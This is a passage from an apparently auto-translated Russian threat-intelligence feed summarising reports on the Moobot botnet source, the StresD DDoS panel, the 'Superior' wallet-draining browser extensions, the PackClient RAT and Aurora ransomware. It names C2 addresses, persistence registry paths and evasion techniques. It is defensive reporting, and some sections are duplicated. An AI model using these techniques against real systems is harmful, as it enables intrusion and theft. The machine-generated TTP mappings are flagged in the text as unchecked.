Восстановленный исходный код Moobot содержит идентификаторы, связанные с известными образцами, включая заголовок регистрации C2 0x336699 и 32-символьный случайный строковый сид `w5q6he3dbrsgmclkiu4to18npavj702f`. Moobot использует собственный протокол C2, аналогичный протоколу Mirai, и поддерживает команды для управления зараженными устройствами и запуска сетевых наводнений (flood-атак). Исходный код также содержит две ранее не задокументированные подпрограммы загрузки и выполнения. Хотя они находятся в неактивном состоянии — одна закомментирована, а другая никогда не вызывается, — эта функциональность позволяла бы оператору C2 направлять зараженные устройства на загрузку ELF-бинарного файла по HTTP, сохранение его в виде исполняемого файла, переименование, создание дочернего процесса (fork) и выполнение. Эта возможность рассматривается как правдоподобный механизм для зафиксированного переиспользования Moobot группировкой APT28, хотя способ получения доступа остается неизвестным.
В каталоге также содержалась StresD Pro+ — панель управления DDoS-атаками на базе Node.js/Express и WebSocket, с отдельными сервисами для пользователей и администраторов. Записи панели фиксировали 32 атаки, в которых участвовали шесть клиентов, на дату сбора данных. В отличие от Moobot, панель запускает локальный Python-скрипт, который генерирует трафик непосредственно с сервера промежуточного хранения (staging server), что превращает активность в атаку типа «отказ в обслуживании» (DoS), а не в распределённую атаку. Скрипт нацелен на серверы Minecraft Bedrock Edition, выполняет рукопожатие RakNet и отправляет некорректные инкапсулированные пакеты и рандомизированные последовательности NACK.
Отдельный сервис на порту 3000 имитировал китайскую систему верификации личности, используемую органами общественной безопасности. Исходный код показал, что отправляемые имена и 18-значные номера национальных удостоверений личности Китая передавались стороннему API, а ответ возвращался в виде результата о совпадении или поддельной личности. В ходе мониторинга позже был выявлен активный C2 Moobot по адресу 162.141.92.192:14123, связанный с более чем 500 задачами атак короткой продолжительности в августе 2026 года.
#ParsedReport #CompletenessLow
27-08-2026
19 Chrome and Edge Extensions Deliver a Wallet Drainer and Credential-Stealing Payloads
https://socket.dev/blog/chrome-edge-extension-wallet-drainer
Report completeness: Low
Threats:
Credential_stealing_technique
Clickfix_technique
Victims:
Cryptocurrency wallet users, Browser extension users
TTPs:
Tactics: 1
Technics: 0
ChatGPT TTPs:
T1027, T1056.003, T1059.007, T1071.001, T1105, T1176, T1195.002, T1562.001, T1573.001, T1656, have more...
IOCs:
File: 16
Domain: 28
BrowserExtension: 18
Coin: 1
Soft:
Chrome, Ledger Live, Outlook, Microsoft Edge
Wallets:
tron, trezor, coinbase, bybit, metamask
Crypto:
solana, kucoin, binance
Algorithms:
sha256, aes-gcm
Functions:
setInterval, k, removeRuleIds
Win API:
sendMessage
Languages:
javascript
Links:
27-08-2026
19 Chrome and Edge Extensions Deliver a Wallet Drainer and Credential-Stealing Payloads
https://socket.dev/blog/chrome-edge-extension-wallet-drainer
Report completeness: Low
Threats:
Credential_stealing_technique
Clickfix_technique
Victims:
Cryptocurrency wallet users, Browser extension users
TTPs:
Tactics: 1
Technics: 0
ChatGPT TTPs:
do not use without manual checkT1027, T1056.003, T1059.007, T1071.001, T1105, T1176, T1195.002, T1562.001, T1573.001, T1656, have more...
IOCs:
File: 16
Domain: 28
BrowserExtension: 18
Coin: 1
Soft:
Chrome, Ledger Live, Outlook, Microsoft Edge
Wallets:
tron, trezor, coinbase, bybit, metamask
Crypto:
solana, kucoin, binance
Algorithms:
sha256, aes-gcm
Functions:
setInterval, k, removeRuleIds
Win API:
sendMessage
Languages:
javascript
Links:
https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DualFunction-Malware-Chrome-Extensionssocket.dev
19 Chrome and Edge Extensions Deliver a Wallet Drainer and Credential-Stealing Payloads
Socket researchers found 18 Chrome extensions and one Edge extension delivering a wallet drainer, credential theft, and other malicious payloads.
CTT Report Hub
#ParsedReport #CompletenessLow 27-08-2026 19 Chrome and Edge Extensions Deliver a Wallet Drainer and Credential-Stealing Payloads https://socket.dev/blog/chrome-edge-extension-wallet-drainer Report completeness: Low Threats: Credential_stealing_technique…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Кампания «Superior» использовала 19 браузерных расширений, которые выглядели легитимными, пока в последующих обновлениях не было добавлено ВПО. Расширения обходили средства безопасности браузера, поддерживали связь с C2 и удалённо загружали JavaScript-нагрузки. Эти нагрузки в основном похищали фразы восстановления криптографических кошельков через поддельные страницы Ledger и Trezor, а также обеспечивали кражу учётных данных и атаки социальной инженерии.
-----
Исследователи Socket выявили 18 вредоносных расширений для Chrome и одно расширение для Edge, связанных с кампанией, отслеживаемой под именем «Superior». Среди расширений были инструменты SEO, утилиты для работы с криптовалютами, инструменты для отслеживания рекламы и приложения для поиска на экране. Четырнадцать расширений были созданы злоумышленниками, а пять были приобретены у легитимных разработчиков. Операторы первоначально публиковали чистые версии, предлагающие заявленную функциональность, а затем внедряли вредоносное поведение в последующих обновлениях после установления доверия пользователей. Одно из расширений, «Enable Right Click & Copy - Smart Unlock + OCR», имело около 70 000 пользователей в Chrome, а связанная с ним версия для Edge — около 10 000 пользователей, что создавало значительный потенциальный риск воздействия через автоматические обновления браузера.
Вредоносное ПО использует фоновый сервисный воркер для управления идентификаторами жертв, временными параметрами выполнения, конфигурацией C2 и загруженными модулями JavaScript в локальном хранилище расширения Chrome. Недавние версии поддерживают постоянное соединение WebSocket с сервером C2 с периодическими сигналами о работоспособности (heartbeats). Инструкции C2 могут ротировать конечные точки и указывать отдельную инфраструктуру для эксфильтрации данных для отдельных жертв. Загруженные модули шифруются с помощью AES-GCM, используя ключ, производный от идентификатора расширения и UUID установки. В рамках кампании использовались домены, размещенные на инфраструктуре, включающей домены зон `.top`, `.sbs` и Cloudflare Workers.
Для обеспечения выполнения кода на посещаемых веб-сайтах расширения регистрируют декларативные сетевые правила, которые удаляют заголовки Content-Security-Policy со страниц и фреймов. Затем контент-скрипты динамически внедряют сохранённые вредоносные модули с помощью `chrome.scripting.executeScript`. Модули создают временные скрытые элементы DOM и обработчики событий для выполнения JavaScript в основном мире веб-страницы, после чего элементы удаляются для минимизации следов.
Наблюдаемые полезны нагрузки в первую очередь нацелены на пользователей криптовалют. На сайтах Ledger и Trezor вредоносное ПО выполняет захват всей страницы и отображает реалистичные поддельные сценарии обновления или восстановления кошелька, запрашивая фразы восстановления из 12, 18 или 24 слов. Эти сид-фразы перехватываются и выгружаются наружу, что позволяет осуществить компрометацию кошелька и кражу криптовалюты. Другие модули доставляют поддельные приманки в виде обновлений браузера, которые могут копировать управляемые атакующим команды в буфер обмена и инструктировать жертв вставить и выполнить их. Фреймворк полезной нагрузки расширяем, что позволяет удалённо развертывать дополнительные модули для кражи учётных данных, опустошения кошельков и социальной инженерии.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
Кампания «Superior» использовала 19 браузерных расширений, которые выглядели легитимными, пока в последующих обновлениях не было добавлено ВПО. Расширения обходили средства безопасности браузера, поддерживали связь с C2 и удалённо загружали JavaScript-нагрузки. Эти нагрузки в основном похищали фразы восстановления криптографических кошельков через поддельные страницы Ledger и Trezor, а также обеспечивали кражу учётных данных и атаки социальной инженерии.
-----
Исследователи Socket выявили 18 вредоносных расширений для Chrome и одно расширение для Edge, связанных с кампанией, отслеживаемой под именем «Superior». Среди расширений были инструменты SEO, утилиты для работы с криптовалютами, инструменты для отслеживания рекламы и приложения для поиска на экране. Четырнадцать расширений были созданы злоумышленниками, а пять были приобретены у легитимных разработчиков. Операторы первоначально публиковали чистые версии, предлагающие заявленную функциональность, а затем внедряли вредоносное поведение в последующих обновлениях после установления доверия пользователей. Одно из расширений, «Enable Right Click & Copy - Smart Unlock + OCR», имело около 70 000 пользователей в Chrome, а связанная с ним версия для Edge — около 10 000 пользователей, что создавало значительный потенциальный риск воздействия через автоматические обновления браузера.
Вредоносное ПО использует фоновый сервисный воркер для управления идентификаторами жертв, временными параметрами выполнения, конфигурацией C2 и загруженными модулями JavaScript в локальном хранилище расширения Chrome. Недавние версии поддерживают постоянное соединение WebSocket с сервером C2 с периодическими сигналами о работоспособности (heartbeats). Инструкции C2 могут ротировать конечные точки и указывать отдельную инфраструктуру для эксфильтрации данных для отдельных жертв. Загруженные модули шифруются с помощью AES-GCM, используя ключ, производный от идентификатора расширения и UUID установки. В рамках кампании использовались домены, размещенные на инфраструктуре, включающей домены зон `.top`, `.sbs` и Cloudflare Workers.
Для обеспечения выполнения кода на посещаемых веб-сайтах расширения регистрируют декларативные сетевые правила, которые удаляют заголовки Content-Security-Policy со страниц и фреймов. Затем контент-скрипты динамически внедряют сохранённые вредоносные модули с помощью `chrome.scripting.executeScript`. Модули создают временные скрытые элементы DOM и обработчики событий для выполнения JavaScript в основном мире веб-страницы, после чего элементы удаляются для минимизации следов.
Наблюдаемые полезны нагрузки в первую очередь нацелены на пользователей криптовалют. На сайтах Ledger и Trezor вредоносное ПО выполняет захват всей страницы и отображает реалистичные поддельные сценарии обновления или восстановления кошелька, запрашивая фразы восстановления из 12, 18 или 24 слов. Эти сид-фразы перехватываются и выгружаются наружу, что позволяет осуществить компрометацию кошелька и кражу криптовалюты. Другие модули доставляют поддельные приманки в виде обновлений браузера, которые могут копировать управляемые атакующим команды в буфер обмена и инструктировать жертв вставить и выполнить их. Фреймворк полезной нагрузки расширяем, что позволяет удалённо развертывать дополнительные модули для кражи учётных данных, опустошения кошельков и социальной инженерии.
#ParsedReport #CompletenessMedium
27-08-2026
Carry-On Compromise: TA4922 Packs PackClient
https://www.proofpoint.com/us/blog/threat-insight/carry-compromise-ta4922-packs-packclient
Report completeness: Medium
Actors/Campaigns:
Ta4922 (motivation: information_theft, financially_motivated)
Threats:
Packclient
Dll_sideloading_technique
Donut
Packclientcore
Packclientlauncher
Mitm_technique
Valleyrat
Chinaz
Billgates
Victims:
Organizations
Industry:
Government, E-commerce
Geo:
China, Asia, Indian, India
TTPs:
Tactics: 1
Technics: 0
ChatGPT TTPs:
T1010, T1012, T1016, T1027, T1036.005, T1056.001, T1057, T1071.001, T1082, T1095, have more...
IOCs:
Domain: 1
IP: 8
File: 16
Url: 1
Hash: 10
Soft:
Telegram, WeChat
Algorithms:
base64, xor, zip
Win API:
CreateProcessW
27-08-2026
Carry-On Compromise: TA4922 Packs PackClient
https://www.proofpoint.com/us/blog/threat-insight/carry-compromise-ta4922-packs-packclient
Report completeness: Medium
Actors/Campaigns:
Ta4922 (motivation: information_theft, financially_motivated)
Threats:
Packclient
Dll_sideloading_technique
Donut
Packclientcore
Packclientlauncher
Mitm_technique
Valleyrat
Chinaz
Billgates
Victims:
Organizations
Industry:
Government, E-commerce
Geo:
China, Asia, Indian, India
TTPs:
Tactics: 1
Technics: 0
ChatGPT TTPs:
do not use without manual checkT1010, T1012, T1016, T1027, T1036.005, T1056.001, T1057, T1071.001, T1082, T1095, have more...
IOCs:
Domain: 1
IP: 8
File: 16
Url: 1
Hash: 10
Soft:
Telegram, WeChat
Algorithms:
base64, xor, zip
Win API:
CreateProcessW
Proofpoint
Carry-On Compromise: TA4922 Packs PackClient | Proofpoint US
Key Findings Proofpoint identified a command and control (C2) framework called PackClient sold on Telegram. It is being used by at least one threat actor, Chinese-speaking TA4922. With
CTT Report Hub
#ParsedReport #CompletenessMedium 27-08-2026 Carry-On Compromise: TA4922 Packs PackClient https://www.proofpoint.com/us/blog/threat-insight/carry-compromise-ta4922-packs-packclient Report completeness: Medium Actors/Campaigns: Ta4922 (motivation: information_theft…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
PackClient — это модульный RAT и фреймворк C2, используемый китайскоязычным актором TA4922 в фишинговых кампаниях с налоговой тематикой, нацеленных на Китай и Индию. Его многоэтапный полезный груз использует маскировку, подмену DLL (DLL sideloading), рефлексивную загрузку, закрепление через RunOnce и процесс-страж. PackClient поддерживает обширный набор функций наблюдения, кражи данных, удалённого доступа, развёртывания плагинов и пользовательских TCP-соединений C2.
-----
PackClient — это модульная троянская программа (RAT) и фреймворк управления, продвигаемый через китайскоязычные каналы в Телеграм. Он использовался китайскоязычным злоумышленником TA4922 в фишинговых кампаниях на налоговую тематику, нацеленных на организации в Китае и Индии. Жертвам направлялись ссылки на URL-адреса, контролируемые злоумышленником, или ZIP-архивы, содержащие исполняемые файлы или образы дисков IMG. Вредоносные нагрузки применяли маскировку, а в кампаниях, нацеленных на Индию, — подмену DLL (DLL sideloading) для запуска Donut Loader перед установкой PackClient.
ВПО использует многоступенчатую архитектуру. Первый этап представляет собой загрузчик, который проверяет наличие повышенных привилегий, извлекает зашифрованную полезную нагрузку второго этапа, расшифровывает её с помощью операции XOR, записывает во временный исполняемый файл, например `%TEMP%\svchost.exe`, устанавливает закрепление через параметр реестра `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` и запускает файл. В некоторых образцах выгруженная библиотека, например `xMain.dll`, выполняется через `rundll32.exe` с параметрами, содержащими URL полезной нагрузки и адрес C2. Затем PackClientLauncher устанавливает соединение с основным узлом C2, загружает модуль PackClientCore, выполняет его отражательную загрузку в память и запускает процесс-страж с параметром `-guard` для перезапуска основного процесса в случае его завершения.
PackClientCore поддерживает более 60 команд и способен поддерживать два независимых соединения C2. Его возможности включают перечисление процессов и окон, операции с реестром, повышение привилегий, функции удаленного рабочего стола, сбор данных из браузеров, управление файловой системой, наблюдение, регистрацию нажатий клавиш, манипуляцию буфером обмена, установку полезных нагрузок и плагинов, а также конфигурирование ВПО или обновление модулей. Он также определяет средства защиты, приложения для обмена сообщениями, браузеры и Telegram Desktop. Потенциальный плагин, специфичный для Telegram, может изменять файлы конфигурации Telegram для перенаправления трафика через прокси, контролируемый оператором.
Дополнительные плагины доставляются в виде данных DLL, закодированных в Base64, копируются в память, резолвятся и исполняются. Для связи используется собственный протокол на основе «сырых» TCP-соединений с кадрированными сообщениями, рукопожатиями, подтверждениями, сигналами «живости» (heartbeats), обменом командами, передачей системной информации и отправки скриншотов. В наблюдаемой инфраструктуре для доставки полезной нагрузки использовался адрес `154.36.188.98:8080`, а для C2 — адреса `206.238.196.96:6666`, `64.81.30.99` и `192.252.180.45:6666`. Возможности для обнаружения включают характерную командную строку `rundll32`, дерево процессов `svchost.exe` и `-guard`, маскировку в временных каталогах, закрепление через RunOnce, конфигурацию реестра PackClient и необычный TCP-трафик на порту 6666.
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)
------
PackClient — это модульный RAT и фреймворк C2, используемый китайскоязычным актором TA4922 в фишинговых кампаниях с налоговой тематикой, нацеленных на Китай и Индию. Его многоэтапный полезный груз использует маскировку, подмену DLL (DLL sideloading), рефлексивную загрузку, закрепление через RunOnce и процесс-страж. PackClient поддерживает обширный набор функций наблюдения, кражи данных, удалённого доступа, развёртывания плагинов и пользовательских TCP-соединений C2.
-----
PackClient — это модульная троянская программа (RAT) и фреймворк управления, продвигаемый через китайскоязычные каналы в Телеграм. Он использовался китайскоязычным злоумышленником TA4922 в фишинговых кампаниях на налоговую тематику, нацеленных на организации в Китае и Индии. Жертвам направлялись ссылки на URL-адреса, контролируемые злоумышленником, или ZIP-архивы, содержащие исполняемые файлы или образы дисков IMG. Вредоносные нагрузки применяли маскировку, а в кампаниях, нацеленных на Индию, — подмену DLL (DLL sideloading) для запуска Donut Loader перед установкой PackClient.
ВПО использует многоступенчатую архитектуру. Первый этап представляет собой загрузчик, который проверяет наличие повышенных привилегий, извлекает зашифрованную полезную нагрузку второго этапа, расшифровывает её с помощью операции XOR, записывает во временный исполняемый файл, например `%TEMP%\svchost.exe`, устанавливает закрепление через параметр реестра `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` и запускает файл. В некоторых образцах выгруженная библиотека, например `xMain.dll`, выполняется через `rundll32.exe` с параметрами, содержащими URL полезной нагрузки и адрес C2. Затем PackClientLauncher устанавливает соединение с основным узлом C2, загружает модуль PackClientCore, выполняет его отражательную загрузку в память и запускает процесс-страж с параметром `-guard` для перезапуска основного процесса в случае его завершения.
PackClientCore поддерживает более 60 команд и способен поддерживать два независимых соединения C2. Его возможности включают перечисление процессов и окон, операции с реестром, повышение привилегий, функции удаленного рабочего стола, сбор данных из браузеров, управление файловой системой, наблюдение, регистрацию нажатий клавиш, манипуляцию буфером обмена, установку полезных нагрузок и плагинов, а также конфигурирование ВПО или обновление модулей. Он также определяет средства защиты, приложения для обмена сообщениями, браузеры и Telegram Desktop. Потенциальный плагин, специфичный для Telegram, может изменять файлы конфигурации Telegram для перенаправления трафика через прокси, контролируемый оператором.
Дополнительные плагины доставляются в виде данных DLL, закодированных в Base64, копируются в память, резолвятся и исполняются. Для связи используется собственный протокол на основе «сырых» TCP-соединений с кадрированными сообщениями, рукопожатиями, подтверждениями, сигналами «живости» (heartbeats), обменом командами, передачей системной информации и отправки скриншотов. В наблюдаемой инфраструктуре для доставки полезной нагрузки использовался адрес `154.36.188.98:8080`, а для C2 — адреса `206.238.196.96:6666`, `64.81.30.99` и `192.252.180.45:6666`. Возможности для обнаружения включают характерную командную строку `rundll32`, дерево процессов `svchost.exe` и `-guard`, маскировку в временных каталогах, закрепление через RunOnce, конфигурацию реестра PackClient и необычный TCP-трафик на порту 6666.
#ParsedReport #CompletenessHigh
27-08-2026
Caught in 4K: The Aurora Files
https://www.cloudsek.com/blog/aurora-ransomware-affiliate-ai-attack-planning-crypto-payments
Report completeness: High
Threats:
Bloodhound_tool
Nopac_tool
Petitpotam_vuln
Printerbug_tool
Eternalblue_vuln
Kerberoasting_technique
As-rep_roasting_technique
Netexec_tool
Shadow_copies_delete_technique
Supply_chain_technique
Certipy_tool
Ntlmrelayx_tool
Dcsync_technique
Kerbrute_tool
Hashcat_tool
Evil-winrm_tool
Chisel_tool
Proxychains_tool
Metasploit_tool
Windows_locker
Victims:
Manufacturing, Food and agriculture, Pharmaceutical and chemical distribution, Professional and consulting services
Industry:
Chemical, Healthcare, Foodtech, Logistic
Geo:
Russian, United states
TTPs:
Tactics: 4
Technics: 0
IOCs:
Domain: 1
IP: 8
Hash: 2
Soft:
Linux, Cloudflare R2, ESXi, Active Directory, Hyper-V, Azure AD
Algorithms:
sha256
Languages:
powershell, rust
27-08-2026
Caught in 4K: The Aurora Files
https://www.cloudsek.com/blog/aurora-ransomware-affiliate-ai-attack-planning-crypto-payments
Report completeness: High
Threats:
Bloodhound_tool
Nopac_tool
Petitpotam_vuln
Printerbug_tool
Eternalblue_vuln
Kerberoasting_technique
As-rep_roasting_technique
Netexec_tool
Shadow_copies_delete_technique
Supply_chain_technique
Certipy_tool
Ntlmrelayx_tool
Dcsync_technique
Kerbrute_tool
Hashcat_tool
Evil-winrm_tool
Chisel_tool
Proxychains_tool
Metasploit_tool
Windows_locker
Victims:
Manufacturing, Food and agriculture, Pharmaceutical and chemical distribution, Professional and consulting services
Industry:
Chemical, Healthcare, Foodtech, Logistic
Geo:
Russian, United states
TTPs:
Tactics: 4
Technics: 0
IOCs:
Domain: 1
IP: 8
Hash: 2
Soft:
Linux, Cloudflare R2, ESXi, Active Directory, Hyper-V, Azure AD
Algorithms:
sha256
Languages:
powershell, rust
Cloudsek
Caught in 4K: The Aurora Files | CloudSEK
The first in CloudSEK's "Caught in 4K" series, where we pull ransomware operations out of the shadows and show exactly how they work. A misconfigured server opened a window straight into an Aurora ransomware operator's playbook: attacker tools, AI-assisted…